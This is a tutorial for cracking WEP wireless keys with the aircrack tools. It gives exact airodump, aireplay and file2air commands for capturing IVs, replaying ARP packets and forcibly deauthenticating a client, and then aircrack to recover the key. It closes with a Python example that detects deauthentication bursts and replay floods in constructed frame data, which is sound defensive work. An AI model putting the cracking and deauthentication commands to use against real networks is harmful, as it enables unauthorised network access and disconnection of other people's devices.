The first thing you will need to do is run airodump to capture the necessary IVs.
usage: airodump ath0 <file prefix> <channel> 1
e.g.
#airodump ath0 capture 9 1
Do NOT close down airodump; open a new shell and start aireplay:
usage: aireplay -3 -b <Networks BSSID> -h <client MAC address> -m 68 -n 68 -d ff:ff:ff:ff:ff:ff ath0
If you are unable to capture an ARP packet you can disassociate the client to force it to ARP.
You can do this using file2air or aireplay: open a third shell and start file2air/aireplay
with the following parameters:
#aireplay -0 1 -a <AP_MAC> -c <Client_MAC> ath0
or
#file2air -i ath0 -r madwifi -n 8000 -d <client MAC address> -s <APs MAC address> -b <Networks BSSID> -f /KNOPPIX/files/deauth.bin
NOTE: THIS CAN CAUSE THE KERNEL TO CRASH
If this fails to produce an ARP you will have to try one or more of the following:
Move closer to the target
Use a high gain antenna
Increase the number after -n (8000 in the example above)
Try a different .bin file, such as beacon.bin
You will need to capture approximately 1 million IVs to crack a 128-bit
WEP key. When you have done this, run aircrack:
#aircrack capture.ivs
NOTE: It is possible to run aircrack in parallel with airodump, but in
practice I have found that this will not always crack the WEP key; once
airodump has been stopped, the WEP key is usually found in a matter of
seconds.
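As an added example (not part of this tutorial and not code from the aircrack tools), the Python script below shows what the traffic produced by the steps above looks like to a wireless intrusion detection sensor and how to flag it: the -0 step puts a burst of deauthentication frames at one client, and the -3 step with -m 68 -n 68 puts a flood of identically sized data frames at one BSSID. The frame records are constructed inline, and the function and MAC names are my own choices.

```python
from collections import Counter

# Constructed sample addresses (not real devices).
AP = "00:11:22:33:44:55"
CLIENT = "66:77:88:99:aa:bb"
BROADCAST = "ff:ff:ff:ff:ff:ff"


def build_sample_capture():
    """Constructed capture: list of (timestamp_s, kind, bssid, dst, length).
    kind is "deauth" for a management/deauthentication frame, "data" for a
    data frame. In practice these records would be parsed from a
    monitor-mode capture; that parsing is assumed, not shown."""
    frames = []
    # Background: a client exchanging a few data frames of varied sizes.
    for i in range(20):
        frames.append((0.5 * i, "data", AP, CLIENT, 100 + 7 * i))
    # Deauthentication burst: 15 frames at one client within one second.
    for i in range(15):
        frames.append((12.0 + 0.05 * i, "deauth", AP, CLIENT, 26))
    # Replay flood: 250 identical 68-byte frames to the AP within one second.
    for i in range(250):
        frames.append((20.0 + 0.004 * i, "data", AP, BROADCAST, 68))
    return frames


def _bucket(ts, window_s):
    # Fixed-size time bucket; a sliding window would be stricter but noisier.
    return int(ts // window_s)


def _worst_over_threshold(counts, threshold):
    # Keep, per key (ignoring the bucket), the highest count that crossed the threshold.
    worst = {}
    for (_, k1, k2), n in counts.items():
        if n >= threshold and n > worst.get((k1, k2), 0):
            worst[(k1, k2)] = n
    return sorted((k1, k2, n) for (k1, k2), n in worst.items())


def deauth_bursts(frames, window_s=1.0, threshold=10):
    """Return [(bssid, dst, count)] for (bssid, dst) pairs that receive at
    least `threshold` deauthentication frames inside one `window_s` bucket.
    A client is normally deauthenticated once, not a dozen times a second."""
    counts = Counter()
    for ts, kind, bssid, dst, _ in frames:
        if kind == "deauth":
            counts[(_bucket(ts, window_s), bssid, dst)] += 1
    return _worst_over_threshold(counts, threshold)


def replay_floods(frames, window_s=1.0, threshold=100):
    """Return [(bssid, length, count)] for BSSIDs that see at least
    `threshold` data frames of one exact length inside one `window_s` bucket.
    Replayed ARP requests all have the same length, which normal traffic
    rarely sustains at hundreds of frames per second."""
    counts = Counter()
    for ts, kind, bssid, _, length in frames:
        if kind == "data":
            counts[(_bucket(ts, window_s), bssid, length)] += 1
    return _worst_over_threshold(counts, threshold)


if __name__ == "__main__":
    capture = build_sample_capture()
    for bssid, dst, n in deauth_bursts(capture):
        print(f"deauth burst: {n} frames from {bssid} to {dst} in 1 s")
    for bssid, length, n in replay_floods(capture):
        print(f"replay flood: {n} frames of {length} bytes at {bssid} in 1 s")
```

The thresholds are starting points, not calibrated values: tune them against a baseline capture of your own network, since a busy access point can legitimately carry many same-length frames per second.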